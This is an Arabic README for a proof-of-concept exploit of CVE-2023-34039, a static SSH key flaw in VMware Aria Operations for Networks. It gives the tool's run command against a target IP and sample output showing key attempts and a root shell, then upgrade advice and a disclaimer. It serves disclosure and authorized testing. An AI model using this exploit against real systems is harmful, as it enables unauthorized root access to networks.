
VMWare Aria Operations for Networks (vRealize Network Insight) — ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر مفتاح SSH ثابت (CVE-2023-34039)
POC لـ CVE-2023-34039: VMWare Aria Operations for Networks (vRealize Network Insight) - تنفيذ أوامر عن بُعد (RCE) عبر مفتاح SSH ثابت
يمكن العثور على تحليل السبب الجذري للثغرة في مدونتي:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

لم تقم VMWare Aria Operations for Networks (vRealize Network Insight) في الإصدارات من 6.0 إلى 6.10 بإعادة توليد مفاتيح ssh لمستخدمي support و ubuntu، مما سمح لمهاجم يمتلك وصول SSH بالحصول على صلاحية Shell بصلاحيات root لهذا المنتج.
تم الإبلاغ عن هذه المشكلة إلى VMWare بواسطة Harsh Jaiswal (@rootxharsh) و Rahul Maini (@iamnoooob) في ProjectDiscovery Research
لقد كتبتُ للتو كود الاستغلال (exploit)، إذا كان يمكن تسميته كذلك، فهو في الأساس غلاف لأوامر ssh.
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform
********************************** ATTENTION **********************************
NTP Service is not healthy.
IMPACT: It may affect the proper working of other services.
ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~#
قم بالتحديث إلى أحدث إصدار، أو خفف من المخاطر باتباع التعليمات الواردة في Progress Advisory
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس مخصصًا لاستخدامه في مهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. القائمون على المشروع غير مسؤولين عن أي إساءة استخدام لهذا البرنامج. استخدمه بمسؤولية.